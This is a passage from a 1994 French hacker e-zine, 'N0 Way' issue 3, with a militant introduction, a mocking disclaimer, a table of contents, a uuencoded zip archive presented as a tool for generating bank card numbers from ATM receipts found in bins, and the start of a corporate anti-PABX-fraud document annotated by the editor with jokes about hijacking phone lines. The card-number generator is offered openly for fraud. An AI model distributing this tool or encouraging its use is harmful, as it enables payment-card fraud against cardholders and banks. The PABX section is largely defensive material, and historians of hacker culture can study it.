home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / n_z / n0way3.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  215.1 KB  |  4,728 lines

  1.  
  2.                                -%!% N0 Way %!%-
  3.  
  4.                       Volume I,   Numéro 3,  Partie 3.1
  5.  
  6.                                 26 Septembre 1994
  7.  
  8.                             \-------------------/
  9.                              >    N0 WAY III   <
  10.                             /-------------------\
  11.  
  12.  
  13. Ce matin, j'écoute la radio: "Une famille algérienne va être expulsée. Le
  14. village où ils habitent se mobilise contre cet avis d'expulsion..." et le
  15. préfet raconte des conneries sur la situation déplorable que devait avoir cette
  16. famille en France sans travail stable et sans sécurité sociale.
  17.  
  18. Mais bien sur, dans son mental de politique verreux, il ne pensera jamais à
  19. leur bonne intégration et aux problèmes qu'ils affronteront en Algérie.
  20. Il ne pensera pas non plus au FIS qui s'attaquera a eux.
  21.  
  22. Je ferme la radio, dégouté ET LA, ca change: non, je ne me dis pas
  23. "Qu'est ce que je peux y faire, je suis isolé"
  24. Je ne me morfond pas en disant: "On peut rien faire contre ces pourris".
  25.  
  26. Si, on peut faire quelque chose et N0 Way 3 est là pour se battre à sa manière
  27. contre toutes ces pourritures.  Maintenant, BASTA...
  28.  
  29.                      Les hackers&phone phreaks sont là !
  30.                                 N0 Way est là !
  31.  
  32. Alors dans cette issue sortie en quatrieme vitesse, j'espere que vous trouverez
  33. votre bonheur.  Ca bouge un peu partout en france, on entre dans l'hiver et
  34. pourtant on sort de l'hibernation.
  35.  
  36.         A Toulouse des assos se sont montées pour faire bouger le monde de la
  37. rave, a Paris c'est une complete effervescence.  Chaque jour, je voie avec
  38. plaisir un nouvel "apprenti sorcier" des réseaux me poser des question sur:
  39. "Comment on hacke?"
  40. "Comment on devient root sur Unix?"
  41. "Comment on seize un trunk au Japon?"
  42. Et les villes suivent: intiative techno & squatts à Lyon, bars & magasins
  43. technos et cyberpunk à Montpellier, raves underground à Lille, développeur de
  44. virus informatiques à Rouen, boite HardCore à Tours etc...
  45.  
  46.         Des initiatives jeunes se montent de plus en plus souvent dans notre
  47. société gérontocratique: Bars technos, Concerts grunge (à prendre au sens réel
  48. du mot), Teknivals (ou teknivaux? :), Bar Cyberpunk, accès Internet pas cher,
  49. home studio d'enfer...
  50.  
  51.         Aux USA il y a déja les Cypherpunks qui ont fait vraiment du boulot,
  52. l'EFF s'est battu comme un diable contre le Clipper Chip menaçant la vie privée
  53. de chacun. Matt Blaze a montré que le SkipJack (implémentation de ce que l'on
  54. appelle le Clipper Chip) était facilement "manoeuvrable".
  55.  
  56.         Résultat: le gouvernement retire le Clipper Chip.
  57.  
  58.         La même bataille reste à mener en France.  En Europe, des choses très
  59. graves se passent sans qu'on en entende tellement parler.  En france, les
  60. "pirates informatiques" sont montrés du doigt comme de petits vandales
  61. informatiques, Satanés gosses, tous les mêmes.
  62.  
  63.         Alors, lisez N0 Way, et RéAgIsSeZ !!!! Faites comme tous les cyberpunks
  64. de France: bougez vous et devenez actif dans le combat contre cet establishment
  65. qui nous étouffe.
  66.  
  67. Dans ce numéro nous vous proposons un superbe article de notre ami Arscene sur
  68. la dissimulation de fichiers, un fichier répandu mais d'une qualité
  69. extraordinaire sur l'insécurité d'Unix par Dan Farmer et Wietse Venema,
  70. le manifeste génial de "The Mentor" traduit pour la première fois en
  71. Francais et plein d'autres superbes articles "mortels"...
  72. Vous pourrez vous "fendre la gueule(tm)" avec un article en particulier.
  73.  
  74. Arrested Developpment, official distributor in Nederland (NL): +31 77 547 477
  75. The One propage -- N0 Way -- en France et en Europe: +33 49 88 76 91 (BBS)
  76.                                                      +33 48 70 10 29 (Minitel)
  77.                                                      +33 48 58 46 17 (Minitel)
  78.  
  79. Vous pouvez me joindre:
  80. ~~~~~~~~~~~~~~~~~~~~~~
  81. Sur RTC 0NE !                   |\    
  82. Sur 3615 TALK                   | >   Bal: NeurAlien
  83. Sur The 0ne !                   |/    
  84.  
  85. Sur Internet !!!!
  86. Email: an133729@anon.penet.fi           (signez vos messages avec votre Email).
  87.  
  88.               >>>>>>>>>>>>>>> TOUT ARTICLE ACCEPTE *<<<<<<<<<<<<<<<
  89.  
  90.                     "This is the network of the life" --Corona.
  91.  
  92.                                                                 ++NeurAlien.
  93.  
  94. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  95.  
  96. Disclaimer:
  97.         Cette publication électronique peut contenir des informations,
  98.         données et articles interdits dans certains pays.  Si les
  99.         informations de cette publication sont interdites dans un pays,
  100.         il est du devoir du lecteur de vérifier qu'il a bien le droit de
  101.         posséder et de lire (ahahahaha :-) cette publication.  Les auteurs
  102.         et éditeurs ne sont en aucun cas responsables d'une mauvaise
  103.         utilisation des informations publiées.   Pour les attaques en
  104.         diffamation et autres conneries bonne pour les censeurs, allez
  105.         voir qui vous croyez être l'éditeur.... Pour la simple et bonne
  106.         raison que de responsable de la publication et d'éditeur il n'y
  107.         en a pas!!!   Les informations fournies dans cette publication sont
  108.         à titre informatifs uniquement.  Nous ne vous garantissons rien et
  109.         si ca vous plait pas allez lire autre chose! Hahahahahahahahahaha...
  110.         Toutefois, la diffusion et la lecture de ce bulletin PRIVE est
  111.         restreinte à toutes les personnes dans l'underground informatique.
  112.         Ne font pas partie de l'underground informatique tel que je le concoit
  113.         les personnes suivantes: Membres d'équipes de sécurité publiques ou
  114.         privés, personnes affiliées à des agences gouvernementales,
  115.         informateurs quelconques, responsables sécurités et autres empaffés se
  116.         croyant supérieur de par leur titre.
  117.         Lire ce bulletin en n'étant pas dans l'underground informatique
  118.         constitue donc une violation des lois de Copyright et de Propriété
  119.         Intellectuelle ainsi qu'un acte de malveillance envers les auteurs et
  120.         les rédacteurs car cela revient à lire des informations propriétaires.
  121. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  122.  
  123.                 Après ça, c'est pas la DST qui peut nous faire un procès pour
  124. N0 WAY...
  125. "Quoi? Vous avez lu de la documentation propriétaire et secrète alors que vous
  126. faites partie d'une agence de sécurité????"
  127.  
  128.                                -%!% N0 Way %!%-
  129.  
  130.                       Volume I,   Numéro 3,  Partie 3.2
  131.  
  132. Table des matières:
  133. ~~~~~~~~~~~~~~~~~~
  134. #     Titre                                     Auteur                  Taille
  135. 3.1 : Introduction                              N0 Way Team               6 Ko
  136. 3.2 : Table des matières                        N0 Way Team               2 Ko
  137. 3.3 : Trash & Carte Bleues                      Field                     9 Ko
  138. 3.4 : Piratage des PABX -- Premier Acte.        *Operator TDF*           17 Ko
  139. 3.5 : La conscience d'un Hacker                 The Mentor                4 Ko
  140. 3.6 : Data dissimulation techniques             Arscene                  20 Ko
  141. 3.7 : Playing hide 'n' seek in CyberSpace       NeurAlien                21 Ko
  142. 3.8 : Cartes Téléphoniques -- Premier Acte.     D. O'Connell              9 Ko
  143. 3.9 : L'Underground Francais sous developpe? *  NeurAlien                16 Ko
  144. 3.10: L'art du Social Engineering               NeurAlien                 7 Ko
  145. 3.11: "Breaking Into Your Site"                 D. Farmer & W. Venema    53 Ko
  146. 3.12: Plaisanter sous Unix                      NeurAlien                10 Ko
  147. 3.13: Du coté d'Internet                        NeurAlien                19 Ko
  148. 3.14: L'explosif? Tient tient...                Inlandsis                 7 Ko
  149. 3.15: Prime & The PrimeOS environment *         NeurAlien                 6 Ko
  150. 3.16: Rave Revolt                               NeurAlien                 4 Ko
  151. 3.17: Multics *                                 NeurAlien                 7 Ko
  152. 3.18: Tel - Trixx                               NeurAlien                 6 Ko
  153.  
  154. Nota: une étoile (*) après le nom de l'article veut dire que cet article a été
  155.       fait pour CORE DUMP et ressort pour N0 WAY.
  156.  
  157.                                -%!% N0 Way %!%-
  158.  
  159.                       Volume I,   Numéro 3,  Partie 3.3
  160.  
  161.  
  162.                                >--------------<
  163.                               > TrAsH &&& C.B. <
  164.                                >--------------<
  165.  
  166. Le fichier suivant est à uudecoder. Si vous savez pas faire c'est vraiment que
  167. vous avez autre chose à apprendre que la contrefacon de numéro de cartes
  168. bancaires.
  169.  
  170. Ce petit utilitaire a été écrit pour ST (GFA basic) par FIELD.
  171. Il permet de générer des numéros de carte bleue à partir des bouts de papier
  172. trouvés dans les poubelles des distributeurs automatiques.
  173.  
  174. Vous pouvez contacter Field sur The 0ne. +33 1 48 70 10 29
  175.  
  176. alors, revetez votre cyber-combinaison, prenez votre portable et votre radio-
  177. modem 28800 bauds puis rendez vous à l'ATM le plus proche pour une autre
  178. session de délire avec N0 Way...
  179.  
  180.                                                         ++NeurAlien.
  181.  
  182. ----------------------------------CUT HERE-----------------------------------
  183. section 1 of uuencode 3.07 of file cb_nums.zip    by R.E.M.
  184.  
  185. begin 644 cb_nums.zip
  186. M4$L#!!0``@`(`&1F)QWUW^]R`04``(X+```+````0T)?3E5-4RY'1D&M5LUO;
  187. M&T44GQW;&W^LG<3Y:H*3C*VH::,VV$DV:1!2V8UWBHMC1W9:A%0)F62K&KEV'
  188. M\4=4]51%XMX#!X[\$1QZ[*DJ$D*<N.',2@@AU`-';N7-?MG+6B8'DOSFO?ST(
  189. MWF_>FYW9612X0Y6;JE(M'&PCZZ>/D'`5L'D)M/V(O$0H^CO@3X1BKQ&2DH#Y(
  190. M2T#U(_&$0RS=.]0JY<!1N2I6CRL%K20H@BH<"'E!PTH.*UM8V<;*#E9DK.QB"
  191. M90\KM["R'U!R64`.L`78!NP`9,!N\*A2SH?XD#/'[9`YA^G+YKAGCONB&9.S5
  192. MS+9EY``$!T$I&P0'YL]B-8?5+:QN8W4'JS)6=[&ZA]5;6-T/J%"%"E6H4(4*0
  193. M5:A0A0H::FXW0"L:LKN#1@1EJ!7%[.82K8A:Z:`\T$&A0NGHWO'$?:U2H`4M7
  194. M6M(^_=Q>/T@P"PYII7R!1K1J52EL9K/94%Y3(8,6#CXN:!4A)VRA,/H;A2DRE
  195. M[81IKYA6#+ZE%.V&7O5OY%O-IOZ,-'1RTCK5"?PU:N2+6O.KGDZND1UR\JC^S
  196. M\&%;[Y#KY(.T@2G:@"PRR&KV'I^W6SQO?Q`+D2)%5W&QGZKH)X_T-H#4SO03`
  197. MR.@,PC(\:A,?';Z!_;J1_N]@BD1<A#$QR$'4["Y"#Y&(4G:/O&<"OX$[9/7G'
  198. MX_[T@P.E<JQ5;;-9RA&*UH)K?:&<=G3\,:`11;=`XR?Z!DFXJ/+("<@L05]W(
  199. ME&Y7;W;KK299=S/6B?ZTWNG6ZEUR>OYEC=P@]08YJQ&]V]9)6V^V'I\3?2AA,
  200. M:WV3HE3H>3]R4FMW]<YF,]<8^%MVC:UQ-7:AZS7W";>'UH"O2%C((NDE-6W<_
  201. MM@M@DV`W?D7?F2^*(*8ZNB+L(.&V@=,_\+F$M#E"KYP/N#SV\$&7#WCXD,L'#
  202. M75Z"&<.R`:[E1V0CX/A1V0@Z?DPV0MSG.N';ACBJGHC+>^N)NKRWGIC+!SV\[
  203. MY/(A#Q]W>='#)UQ^PL-/NGS8PT^Y?,2S#@G9"#O]3LI&Q/&G9"/J^-.R$7/\B
  204. MI&Q(CC\C&W''GY6-A.//R<:DX\_+QA3W^9X0^)EQ]P3_C^\!!'M@%NPB"T]<0
  205. M/+=V`1PD-,_/S-T\6YR\</;&72=R,73QPMDOV-YU4UR+(9$MBBQ"K<@E%AVA*
  206. M^2U;\FDNL:5QFDLBB]F:*2:-T'S+4C[-%$N-TTR)+&YK+K.$7_.3C]BR3W.92
  207. M+8_37!;9I*VYPJ9&:'[#5GR:*VQEG.:*R*9MS566'*'Y!UOU::ZRU7&:JR*;@
  208. ML34)F_5K%C]DQ*=)&!FG240V9VNFV?P(S1<L[=-,L_0XS;3(%FS-#$-A-QLB@
  209. M.;?&4&R82YCS_,;6)):Q]CRFQ]:;^_`7VD1/<?$S?OI6S#,8)9D]%@9$`%%`]
  210. M+-,7."<!XH`$8-+FI@#3@"1@QN9F`7.`><!"IC]'1OUD^$D<NC$>#.XK3/[7:
  211. M"IR.=7L5!V<=TR?F>BVP!=%^+H%W])WU7$H_LH69P3.8<6\&GA%G\1$9KUE\D
  212. M*./4O5-XAL0D3X;Y3$JOF#3#-IP[>Q=NS?GB>JM]6F_6NGJO3;XFW7:K=W;.V
  213. MFT*9_K3]+=&!*[-1/X4K\%^KR#N-FO>\U>E@]+[IIBFU[)7A.%KY:KMYOB
  214. M]1KZLYMGK5Z'])KPD=&S+F;GH^-:^?W2=9(VDM3JN:P:R??@(T$P38O:MZQAO
  215. M[:YRA2:1*/PU5`N?/8B^_P=02P,$%`````@`X'OU'!=FX(YY`@``\P8```L`(
  216. M``!214%$7TU%+D=30U/`#FX=(0CV\W)A5Z>P62%:V]@X5E?#4%/7Q-+"0M?<2
  217. MS-)0(2"Q*+-8WZTH,2\Y%:@$AX&;%4Z>I0[8K;`98N`NA5MP?]VY<^?^_?M`M
  218. M4@&/$!9%"@K[@>;`#82!V_?!)$CI_=MP(3U4(9`B/51%$``U$`F`I/44[MR_?
  219. M#01WP#P(@2($Q+^01'BY[@-MN`V"0./OW84:=/OVIMNW[X*X0/P+50BB"$@BA
  220. M%$$-!ID!=--M!8B!</M!FL"*(5+H0O<A0`%-$1AC&/>+H'%P0,@XN&^!&*04$
  221. MZ!60T`]4(84[4/?=AXN09!QV&X`8IW'W;X-C'=EGMS$]"Q4"I30P0"BZ#XG,U
  222. M^U@BXP=A`Y%"#ZX(;@*2@7=0DLMM1$KXB6K@O=N0P$-6=.<V#&-)PC^!?@(IW
  223. MO8^1@A"._JF`4(21K<`Y#V2KPIW;"$-O*R"Y`*SH)[(B&$#*IP?@@I`,#4ZC:
  224. MD*`!!SB4ANE'4P0!-Q$&GJ!2T;0'8N`!U/)OLX);9DJ^7VJ)E9&5D8F!OI&AF
  225. MD:&>D:%"<$%B439(N-C`($\A.3\W,R]=83-:X7D3+1I`X,`1$@#(@`!G?8\`%
  226. M$PM]QQ)@6:WOD9B<K9ZG4)!1E)J8#;13WR4_N5@_(!-(!.>7YJ7\"DY-+LDOL
  227. M4C#(2]5W+2S-S,NOT'?U-M!W*RTJR2Q+U8>X*"C86=\OM5PA.+&DM"A/(=PCF
  228. M\)=S?EY)47Z.0DAJ8JZ^8U%V1F*N@AM0/""C"&@E4#^0\,M7"$^L5$C)+"Y1\
  229. M*,XL2?V%\)^BP@<_@P\*08XAG@80IHNCIT^D@H^GKV<(1"`@R#/,T3D2PG%T?
  230. M"@WV#'-5<'/T=E50Y.4"`%!+`P04````"`"2H@(=BOTJL54"``#Y!0``#```C
  231. M`%)%041?1$E3+E546%,`@0T;-^$"&S<`Y>^`52GHX5?(RP4S[/9],+BM`)9!J
  232. M\("&Z8'5_$15B`K`"I$,4[A]7V'#!IAA<![894"3_H$<AJ00%6`:IK`!V3`%7
  233. MF!JHRQ`*,<W"-.P^BF'W$88IH'@3[C&(*5`NNF$P*R"&(2P$^>\^./B18PI54
  234. M/7H$*&P$`5B(0GC(+D.+S=MP%;@-0P5($0"*`07B#<.2=K!%`$(*B4(S[#Y6@
  235. M`/?F?4@,(`Q#J,!B&.Z$#8U(HG.`PBV%(Q0"A?U0LS8#<>@OA?>_%%Q^*3SY.
  236. MI1#T2\$=3!K\0H@#00A85N,7B&$`%E\+Y@:#9#?#'':`<H?=A)D%LC3CB4+>E
  237. MDW*%D"]/\EP4\N<KK/4[].3+^V4AF09YCCD*X8E![Z(4D@U*@[ZL?1>TUB]='
  238. MP>"+^[+W:X.7A:PUR-,#&C0W/U0]1<%GK7>JPB$#A:0G"LO>*X2&P+4HK%`P6
  239. M*`(I*E)XF._XQ44AU[%2X>$[D)*4M<4A7]8FA1[RS'^O4+RVY(G""K##(.H5$
  240. MLD*+0Q3*'?-"%(H-<I\HY+LI`(U4F+\V[PE0M.A)%=!DGW<A"I4&I0H:RWQRC
  241. M%`SRX(H\`A7R@Q2L8-X,?>_R),@]R!](*X0\T0@Q>+_6.5C!,??)E[7)CGD*[
  242. MX4#E5@I!3QX^\5'P>;(V.#3HB8*VH;Z%@:&N8["WKLG:$$7\)CTI#<H/>`<W1
  243. M*<3CB8+!^R<*#Q\&`[5H&QOK&YI86N@&/0DF9)!C\=IE?B!IB$$N&D#O_'X2F
  244. MY./OZ`(TR,+42-_(W%`WV"#<PS'$GI<+`%!+`P04````"`#H92<=:TQK`&8'R
  245. M```J$0``"P```$-"7TY535,N1$]#K5C?;]M&$GXWX/]AWF3'%FDGOL0QF@"VF
  246. M$C<IDM9-?%?@C@=A1:WLO?"'LB3=7$S=@P"_]*^^;V:X$M4F=0N43B*2N_/-`
  247. MS#??S%KQ=G9"YZ]?OGFQO45\S7UYY4V>6YI;G]NZ-D5-4TO>UKYL;JS'0T5%Y
  248. MDR]]6?%":GQMJ;.>F"(USENZH[GQKM;=3RF]=K.9QVUE27`8M6H\97A'P;IV.
  249. MZ0=;*ZKUM7$%[EU5>S=I:MMX69FX+,.F:'MK>VMD4T>V0H!ED5)F\)DVN2UJV
  250. M4[NRH&G32^=CXU;>K?B<&N!G`^,1'5X)"X?1/U]?1'3F;`$+CJ,'86A9+\&$'
  251. M&<(Z<]62L.O;\]/AF:E<2O]ASHK*BB$G5LV7J3/86-M*B+@829ZP+@:F\25(-
  252. M,$W:%.QCDOV2,V\9QVBF#;,(^(O3]Z/3-\CV[]AE&YH.7#$K?2X95BL.OT;3>
  253. MR?86X!%_,:6BS"<`Q>*+TS/:Z9L@C+ID3`Y];;V+PMR4386<(04"DI9(7[IBR
  254. MBOU<23!?E4JRU35S8UP-:[^LG5\2E])UO'3B83?O7I]1V5!:YO/:1C3JK[$HK
  255. M>)W+RQM*T`T_\ZR!LFJN;6WSN>3:TQ=B<YE2G)8>;^8E,K]#Z)8563O+EFLOM
  256. MHS-J:B>UG)?"95<@UCM2B'!K/\%19D\(*6R$/]+HCIX^.:*#PX>/Z.AOCY_0.
  257. M\=/#`\C#?H$KZPWG=$(/'_%6[)2-G&8O6A&S:3XA+W.C[><+9U'759IP#BXXL
  258. M2>F^T':0R7<#X\!Z;OS'9@GY0I%3QE`Q=TW%]9>2UE;@*XZ512WMAXJ`PV+PI
  259. M7PA>Y:DI`YW[`I+KBBS_3&T.<=G/7"1N/0IS(E58@00-0)]P5P&Z:F8S)U-EP
  260. M)L."!3RWM>,V014F-N,WO88=LO6-Q"H]:S4%J1@@T9VFJN`2XJB<=H#[C$RM7
  261. MCHEW%K9,PAWE9=%K:,2B4VYSPK%8I&MU3-C^N$/-;]#2S%F*_E7<;&/(L9!K,
  262. M,=8Q@5L1,%>JT2Z>^U\J.CX(P!&]SI1-H08JF6*=K4OM9EF#O\*F-0+DKG\[B
  263. M^N$MEPJ(:%[/1#6I4J*4,6,BZ$D9*L@MD#N6CH0%<MZB<^MFOIR95$;F$@(1A
  264. M-@(7:TH#"2'],$%7;`'N37]<]N5!==D`=V`FI9]N=A'$R^($'%=<IKFEH[76:
  265. M=Z2_NNZ$>U>9BLZ^O\!P`FL5]U167H7)-662_!<],+RVV5!*P\WF6>(BIDD8V
  266. M^5-1HZ\8B`>93>45"H_PF6D]L124MS:B3--4F`^"`B5!UEZZ%,?+U4JXJ8Q>S
  267. MH=U5?%[HK*RDI=@W7H'-JN%5B!H?&,N3I12<>>YKBM,IK*@03F6^`:O)2R=%V
  268. MV9Q36C2QWD%9W<PIZ*/'AT<BI5WIE._6_AD-*+TSK)LZH<#=&<O#"HE+AW9#T
  269. M(<,TT,YFXDR^S%SINP/K;O-(92]=7*LS$*:8!,.,!?4/AIRS%#]W#.>:LEDUG
  270. MPKO+T?"'[U]VOT,0Y:Z`?49'Q\,G!\/#@^'#I\138F*R\)O.]M8EY&BE($SC>
  271. MG1SL4RA_[I?I$IKEDA52/EGZV`SN,,RXS3A4GN8I$IHQKH[(U%1=]5BI.#HP;
  272. M\SP/%9[IE9ED[(E/X>TMG/$#/70Z"JW,ROZY+L6@KUW#9T-Z@1+-7"8,5G9*5
  273. M];5O>($-]XCB7YE$]+M7O-X4L>.XE1</?N.Y'/;0!OA1\W8\'D?1N$/:`T0<?
  274. MXQ5>C&4EXEO:ER>YY5W\3SMH!^L`<"6=[V`LS@90;;<<]T*.@UD27H['+2ZV3
  275. MVEV%F224C,=Q,):]+2),QNL(^1.>$UKP,S8LU#P.(`OQU"8!L7\M:!RWH5RWX
  276. M8AL+7,Q_NOLUSP(2WW:/"K5(-.68@XHYV`YPC\!&JYRTBH?`^95P+RA)*S=)^
  277. M>%3@!=]%RO.NIAP%L@`GCD)&XUW>V:ZH3/1OLGJ\[2J4:)WE/@XIQQTC0IQ$K
  278. MJ-ERT'M*9;R)R!:W?0J3/IYDW++A0IG9462%C=>W29>EL-HQR>%A^T+A]L+F?
  279. M7?T(BDG&.VNTE:@6BIUH#(N.WUB(7P7'*.,.[#9DC?L!*$Q6R8B9PB?CF%9NF
  280. M-0:`19UWYFM'_F@B(M6D72E5-L:B`7E\UE69QKH6`HLT-+9J^2G1#A[2\`'^&
  281. MALIIZ61CI!"J@R1P\6`]=D)OM2$I#;D-XN=.ZV_\53WC(&`=$FP\Z&^):#U'N
  282. M,`6HOPZCL[/WNIS$7YB$>QM/@TW8:.W@-Q>FV[._]MK>>H]?RDI/!X6-7WXH1
  283. MX_/SR_@E3I6B_!2?-_C*<6/C4__AVN3TTZL?:?B_(7WS7#Y&.,=\F=&EQ=JY6
  284. MMT5Z3:]^O"_"Y_3J`H<;_53Z;$KXZFGIFWLBY`.#Z")^%9_&HWW8'QWOT[G)W
  285. M<)#NT_O+?3K-W979Y^^G/QMO/^_3M2OJ:I]&UX8_^-S*2WR_(-(SYGY:GM,[&
  286. M5USA.^?/=')/?*L(_X6Z/L+/OR'8'3I$TQ[AU^HA'>/G"3X?X^E03K]#^K:DH
  287. M@_B-/%S@?QHJJ/`<WW)QH/_1"/_4M;WU?U!+`0(7!10``@`(`&1F)QWUW^]R3
  288. M`04``(X+```+``````````$```````````!#0E].54U3+D=&05!+`0(:!10`*
  289. M```(`.![]1P79N".>0(``/,&```+````````````(````"H%``!214%$7TU%=
  290. M+D=30U!+`0(:!10````(`)*B`AV*_2JQ50(``/D%```,````````````(```'
  291. M`,P'``!214%$7T1)4RY55%A02P$"&@44````"`#H92<=:TQK`&8'```J$0``\
  292. M"P```````````"````!+"@``0T)?3E5-4RY$3T-02P4&``````0`!`#E````D
  293. MVA$``+,!1&EZ('=A<F4@=V%S(&QE96-H960@9G)O;2XN+@T*R<W-("#;V]O;)
  294. MLB#;V]O;LB#;V]O;LB#-S;O)S<W-(%LK,S-=+2@Q*2TT.3@X+3<V.3$@<V]OT
  295. M;B!A;B!54U(@5C,T(&YO9&4N+BX@S<W-NPT*NB`@("#;LB#;LB#;LB#;LB#;N
  296. MLB`@("`@(+JZ(%-E8W1O<B!/;F4O17%U:6YO>"]%2T\O1G5R=&EV92]&1E0O<
  297. M07)K:&%M+TI&1B!72%$@N@T*NE1H92#;LB#;LB#;LB#;LB#;V]NR($)"4[JZ/
  298. M("%&=6-K(2]#;VYT<F]L(%1E86T@1DA1("T@4&AR86-K+TYO(%=A>2!D:7-T9
  299. M('-I=&4@N@T*NB`@("#;LB#;LB#;LB#;LB#;LB`@("`@(+JZ(%!#+T%T87)II
  300. M+TA0-#@O4$A!0R]-:7-C96QL86YY("T@2G5S="!K97=L('=A<F5Z("$@N@T*=
  301. MR,W-("#;V]O;LB#;LB#;LB#;V]O;LB#-S;S(S<W-($ME=VP@<F%T:6]S+"!NZ
  302. D;VYE(&9O<B!L;VYG+61I<W1A;F-E(&-A;&QE<G,@S<W-O`T*6
  303. ``
  304. end
  305. sum -r/size 57111/7388 section (from "begin" to "end")
  306. sum -r/size 39491/5256 entire input file
  307. ----------------------------------CUT HERE-----------------------------------
  308.  
  309.                                -%!% N0 Way %!%-
  310.  
  311.                       Volume I,   Numéro 3,  Partie 3.4
  312.  
  313.  
  314.                             ,{$'    Piratage   '$},
  315.                   .    __=/%(~{;               ;}~)%\=__    .
  316.                          ~\|[:&^      des      ^&:]|/~
  317.                            `\![!               !]!/'
  318.                              `+#    P.A.B.X    #+'
  319.  
  320.                                     PART  I
  321.  
  322.         Avant propos:  Apparemment, en France aussi les grandes entreprise se
  323. mettent à réagir contre le piratage des PABX.  Ce document provient d'une
  324. grosse entreprise francaise et concerne le piratage des PABX.
  325. Interressant de voir comment le monde des hackers est aidé par les entreprises.
  326. J'ai trouvé ce document dans les poubelles du secretariat de l'entreprise qui
  327. produit ce document! arf'''
  328. ps: ce qui est entre crochet vient de moi.              ++NeurAlien.
  329.  
  330.                                 --------
  331.  
  332.              Le piratage classique des systemes telephoniques PABX
  333.  
  334.                         Societe Operator TDF
  335.  
  336. [ya pas de copyright, on est inattaquable hehehe]
  337.  
  338. Le Piratage telephonique.
  339.  
  340. Sommaire:
  341. 1°) Approche chronologique en terme de piratage de ligne:
  342.    A) Premier controle de facture
  343.    B) Controle de la facture suivante   [Kewl, ca nous laisse 4 mois tranquile]
  344.    C) Prise de conscience               [ptin ils sont lents ;) ]
  345. 2°) Approche chronologique en terme de perte de contrat
  346.    A) Baisse du chiffre d'affaires
  347.    B) Augmentation du CA du concurrent
  348.    C) Prise de conscience               [bin oui, t't'es fait niquer! ;) ]
  349. 3°) Les types de piratage:
  350.    A) Ecoute des communications
  351.    B) Detournement d'une ligne
  352.    C) Recherche des lignes modem
  353.    D) Sabotage des systèmes             [Beurk!!!!]
  354. 4°) Les méthodes de piratage:
  355.    A) Piratage d'une ligne.
  356.    B) Piratage d'un base TSF.           [Telephone Sans Fil je crois]
  357.    C) Piratage des fonctionnalités d'un PABX.
  358.    D) Piratage des auxiliaires d'un PABX        [Messagerie vocale par ex.]
  359. 5°) Les moyens à mettre en oeuvre:
  360.    A) L'acces des locaux
  361.    B) Protection des informations
  362.    C) Destruction des informations périmées
  363.    D) Sauvegarde de l'information
  364. 6°) Les moyens de controle:
  365.    A) la taxation téléphonique
  366.    B) L'observation de trafic.
  367. [==Deuxieme partie dans le prochain numéro==]
  368.    C) Le controle qualité des lignes.
  369. 7°) La protection des lignes des systèmes [a partir d'ici, c'est sur le mec   ]
  370.    A) Piratage du mot de passe            [ qui a écrit ca avait fumé ou      ]
  371.    B) Mot ou clef aléatoire               [ gobbé un acide                    ]
  372.    C) Cryptage des lignes
  373.    D) Cryptage du disque dur
  374.    E) réorientation des appels
  375. 8°) Les supports de transmission.
  376.    A) Les supports radio.
  377.    B) Les supports physiques.
  378.    C) Les cabines de brassage.
  379.    D) la gestion des supports.
  380. 9°) Les couts du piratage:
  381.    A) cout des fonctionalités
  382.    B) cout de la telemaintenance
  383.    C) Piratage volontaire du PABX
  384.    D) Piratage de l'informatique
  385. 10°) Les méthodes:
  386.    A) Introduction
  387.    B) La méthode MARION
  388.    C) La méthode MELISA
  389. 11°) La loi godfrain:                   [ Rahhhh.. chiotte galactique !]
  390.    A) Intro
  391.    B) destruction
  392.    C) les niveaux de cette loi.
  393.  
  394.                                 Document
  395.  
  396. 1°) A)
  397.     taux normal: augmentation de la facture : 4% tous les deux mois.
  398.     Element moteur: elevation anormale de la facturation
  399.     controle par rapport aux factures precedentes.
  400.     detection: taux d'augmentation constant, passant brutalement d'une
  401.     facture sur l'autre de 4% à 9%
  402.     constat: augm.o brutale de 5% en plus des 4% habituels.
  403.     pourquoi?
  404.     - pas de changement de contrat, pas de creation de nouveau service.
  405.     Action: demande de controle et facturation detaillee pour les mois a
  406.     venir.
  407.    B) facture suivante:
  408.     meme chose : augmentation 9%
  409.     analyse: verif de la fact. detaillee.
  410.     constat:    - appels minitel
  411.                 - appels vers l'étranger
  412.                 - appels en dehors des heures ouvrables
  413.     question: interne ou externe?
  414.     reponse: les deux
  415.     conclusion: le système est piraté.
  416.  
  417.     Cette conclusion doit rester interne et confidentielle.
  418.  
  419.     action: eliminer les causes interne en premier
  420.     action sys: controle d'acces
  421. >>> EVITER DE FAIRE CONTROLER SON SYSTEME PAR SON INSTALLATEUR OU
  422.     CONSTRUCTEUR DANS UN PREMIER TEMPS.
  423.    C) prise de conscience
  424.     a) demande d'info:
  425.        - autres entreprise
  426.        - presse spécialisée
  427.     b) declenchement d'une mission interne preliminaire:
  428.      1) constitution d'un groupe de travail.
  429.      2) definir les objectifs
  430.      3) definir un planning
  431.      4) rechercher un cabinet independant disposant d'experts en la
  432.         matiere.
  433.      5) presentation du probleme.
  434.      6) Etablir un contrat definissant la mission du cabinet.
  435.      7) signature du contrat.
  436.     c) declenchement d'un audit.
  437.      1) def.o de la mission
  438.      2) planif.o "   "
  439.      3) analyse physique de l'existant
  440.      4) analyse des risques financiers
  441.      5) analyse du système
  442.      6) definition des controles à mettre en oeuvre
  443.      7) definition des tests à réaliser
  444.      8) mise en oeuvre de 6 et 7        [ OUARF... TROP UTILE LA 8) !!! ;) ]
  445.      9)         [yen a pas!!!! bin alors ?? ;) ]
  446.      10) Consignation des résultats
  447.      11) les recommandations à mettre en oeuvre
  448.      12) Synthèse économique et technique sur les risques et les moyens
  449.          complémentaires de protection à mettre en oeuvre.
  450.     d) action:
  451.      mise en place des solution d'urgence préconisées.
  452.  
  453. 2°) [ c'est chiant je passe]
  454.    résumé: voir si ya pas un employé qu'est parti à la concurrence.
  455.  
  456. 3°) les types de pirate:
  457.    A) detournement d'une ligne pour téléphoner [ ouais !!!!! Beige Box rules ]
  458.    B) detournement d'une ligne pour appeler des serveurs Nitel [ kewl ! ]
  459.    C) ecoute des communications [ c'est vous qui le dite ;) ]
  460.    D) Le pirate informatique, vol d'information [ bande de paranos, on
  461.       en a rien a foutre de votre bilan commercial cumulé sur l'effectif
